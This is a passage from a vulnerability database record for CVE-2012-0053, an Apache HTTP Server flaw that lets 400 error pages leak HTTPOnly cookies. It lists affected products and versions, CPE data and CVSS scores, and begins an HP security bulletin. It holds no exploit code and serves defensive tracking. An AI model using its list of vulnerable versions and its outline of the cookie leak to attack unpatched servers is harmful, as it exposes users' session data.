"v70001.3.23" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "6.0" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "12.1" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-10-01" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "freeflow print server 73.b3.61", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.13" }, { "model": "web server 02-04-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.38" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.46" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.63" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.14" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.20" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-00-05" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.18" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "2.2.22-dev", "scope": "ne", "trust": 0.3, "vendor": "apache", "version": null }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-10" }, { "model": "interstage studio enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.1" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "7.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-10-09" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.15" }, { "model": "interstage studio standard-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "8.0.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.9" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-00-04" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.3" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.32" }, { "model": "interstage studio enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "5.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.47" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.1.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.56" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.37" }, { "model": "interstage studio standard-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "10.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "xp provisioning manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.0.0-00" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "web server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "02-05" }, { "model": "web appliance", "scope": "ne", "trust": 0.3, "vendor": "sophos", "version": "3.8.1.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "storwize unified", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70001.40" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "interstage application server standard-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.3.1" }, { "model": "web server )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "02-04" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.44" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.19" }, { "model": "web server 01-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-10-10" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.64" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "apache", "scope": "ne", "trust": 0.3, "vendor": "apache", "version": "2.0.65" }, { "model": "p9000 replication manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-00" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "p9000 replication monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0.0-00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.11" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.52" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.36" }, { "model": "web appliance", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "3.8.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-00" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00-060" }, { "model": "interstage job workload server", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "12.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.6" }, { "model": "jboss enterprise web server for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "61.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.16" }, { "model": "xp provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0.0-00" }, { "model": "interstage studio enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.12" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.53" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "interstage apworks modelers-j edition 6.0a", "scope": null, "trust": 0.3, "vendor": "fujitsu", "version": null }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "web server windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "04-10-03(x64)" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "web server aix", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "web server 02-04-/c", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.5" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.48" }, { "model": "web server solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "xp p9000 command view advanced edition", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.0-00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "web server hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "03-00-01" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.2" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.40" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "interstage studio enterprise edition b", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.61" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2.4" }, { "model": "p9000 tiered storage manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1-00" }, { "model": "cosminexus developer no version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "interstage studio standard-j edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.1" }, { "model": "interstage application server enterprise edition a", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.2" }, { "model": "web appliance", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "3.8.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.58" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.54" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.42" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "8.0.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.2" }, { "model": "interstage application server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "7.0.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.41" }, { "model": "cosminexus application server no version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "apache", "scope": "eq", "trust": 0.3, "vendor": "apache", "version": "2.0.57" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "interstage studio standard-j edition b", "scope": "eq", "trust": 0.3, "vendor": "fujitsu", "version": "9.1.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" } ], "sources": [ { "db": "BID", "id": "51706" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "NVD", "id": "CVE-2012-0053" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0.65", "versionStartIncluding": "2.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.2.22", "versionStartIncluding": "2.2.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:10:sp4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:storage:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_web_server:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2012-0053" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "120980" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "111293" }, { "db": "PACKETSTORM", "id": "113582" } ], "trust": 0.5 }, "cve": "CVE-2012-0053", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.3, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2012-0053", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2012-0053", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2012-0053", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-0053" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "NVD", "id": "CVE-2012-0053" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. Apache HTTP Server is prone to an information-disclosure vulnerability. The issue occurs in the default error response for status code 400. \nSuccessful exploits will allow attackers to obtain sensitive information that may aid in further attacks. \nThe vulnerability affects Apache HTTP Server versions 2.2.0 through 2.2.21. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03691745\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03691745\nVersion: 1\n\nHPSBST02848 SSRT101112 rev.1 - HP XP P9000 Command View Advanced Edition\nSuite Products, Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2013-03-27\nLast Updated: 2013-03-27\n\nPotential Security Impact: Remote disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY 